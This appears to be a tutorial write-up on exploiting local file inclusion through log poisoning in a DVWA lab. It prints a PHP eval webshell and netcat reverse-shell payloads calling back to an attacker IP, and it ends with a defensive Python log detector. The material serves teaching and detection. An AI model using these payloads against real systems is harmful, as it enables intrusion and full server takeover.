File contained log poisoning (user agent)
2022-06-29 12:47:00 【Ink mark vs. breeze】
I. Local file inclusion
A local file inclusion (LFI) vulnerability arises when a PHP page includes a local file chosen by the user. Through it an attacker can read files on the same server and, ultimately, obtain a webshell.

The ?page= parameter is the telltale injection point; the page prompts us to enter ?page=index.php.

From the error message we learn that the directory of the included file is /var/www/dvwa/vulnerabilities/fi/
We can try ../../../../../etc/passwd to see whether the system's default user account file is displayed.

It is accessible. There is therefore a local file inclusion (LFI) vulnerability, and password files and other sensitive files can be read this way.
II. Log poisoning
How can the LFI vulnerability be used to obtain a reverse shell and fully control the target host?
By injecting malicious code into a file the web server can read, then including that file so the code is executed, for example:
/proc/self/environ
/var/log/auth.log
/var/log/apache2/access.log
Log files are usually used for this, because requests to the server are normally recorded in them.
For example:
Open Burp Suite and enable the proxy. In the browser, visit the following URL and capture the HTTP request:
http://192.168.164.129/dvwa/vulnerabilities/fi/?page=../../../../../proc/self/environ

We see that the User-Agent header ends up in the included content, so we change it to PHP code in the request and try forwarding it.

After modifying the request, forward it and check the result:

The PHP code is executed. So we can replace the payload with the PHP code of webshell.php to obtain a webshell.
For example, inject a one-line webshell
<?php @eval($_POST['pass']);?> and then connect to it with AntSword.
Obtaining a reverse shell and taking full control of the target server
Method 1:
Taking a different approach this time: from the file upload article we know that passthru("") is a PHP function for executing system commands, so here we use netcat to execute a command that connects back to a listening port.
Construct the payload: <?passthru("nc -e /bin/sh 192.168.164.128 8888");?>

Then start a listener in Kali.

Forward the modified request; the result is as follows:

The target host is successfully controlled.
Method 2: /var/log/auth.log
Access the log file

We find that port 22 is open, so we can try logging in over SSH to see whether the attempt is recorded in the log file.

Log in with the account name random and type any password. Then refresh the browser page and search for random: the log file has recorded it.

This shows that what is entered at the SSH login is written to the log and executed when the log is included, so we only need to replace it with the reverse-shell payload.
Construct the payload: <?passthru('nc -e /bin/sh 192.168.164.128 8888');?>
Start the listener and, at the same time, log in over SSH.

The command here needs to be base64 encoded; the encoded result is as follows:


Finally press Enter in the SSH session and refresh the browser page: the injected command executes and the shell connects back to the attacking host.

The target host is successfully controlled.
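As an added defender-side example that is not part of the original post: a small Python check that flags, in constructed Apache combined-format access-log lines and sshd auth.log lines, the two poisoning patterns used above (a traversal in the page parameter reaching /proc/self/environ or /var/log together with a PHP open tag in the User-Agent, and a PHP open tag in an SSH username). The log formats, host names and sample lines are assumptions; the PHP one-liner in the sample is the one quoted in the post.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample lines (not taken from the original post): one benign and one
# poisoning attempt for each log type.
ACCESS_LOG = [
    '192.168.164.128 - - [29/Jun/2022:12:47:00 +0800] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '192.168.164.128 - - [29/Jun/2022:12:48:10 +0800] "GET /dvwa/vulnerabilities/fi/?page=../../../../../proc/self/environ HTTP/1.1" 200 4210 "-" "<?php phpinfo(); ?>"',
]
AUTH_LOG = [
    "Jun 29 12:50:01 dvwa sshd[2211]: Accepted password for alice from 192.168.164.130 port 50122 ssh2",
    "Jun 29 12:51:44 dvwa sshd[2240]: Invalid user <?php @eval($_POST['pass']);?> from 192.168.164.128 port 50140",
]

PHP_TAG = re.compile(r"<\?(?:php|=)?", re.IGNORECASE)  # any PHP open tag variant
# Files that turn a read-only LFI into code execution when reached by traversal.
SENSITIVE_TARGETS = ("/proc/self/environ", "/var/log/", "/etc/passwd")
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def check_access_line(line):
    """Return a list of finding strings for one Apache combined-log line."""
    m = ACCESS_RE.match(line)
    if not m:
        return ["unparseable line"]
    findings = []
    url = urlparse(m.group("target"))
    for key, values in parse_qs(url.query, keep_blank_values=True).items():
        for v in values:
            decoded = unquote(unquote(v))  # also catch double-encoded traversal
            if "../" in decoded or "..\\" in decoded:
                findings.append(f"traversal in parameter '{key}': {decoded}")
            if any(t in decoded for t in SENSITIVE_TARGETS):
                findings.append(f"sensitive target via parameter '{key}': {decoded}")
    if PHP_TAG.search(unquote(m.group("ua"))):
        findings.append("PHP open tag in User-Agent (log poisoning attempt)")
    return findings

def check_auth_line(line):
    """Return findings for one sshd auth.log line: a PHP tag in the username field."""
    m = re.search(r"Invalid user (?P<user>.+?) from \S+ port \d+", line)
    if m and PHP_TAG.search(m.group("user")):
        return ["PHP open tag in SSH username (auth.log poisoning attempt)"]
    return []
```

Run each function over the matching log source line by line; a traversal finding on its own is worth alerting on, and a PHP tag in either field is a strong signal that the log file itself is the target.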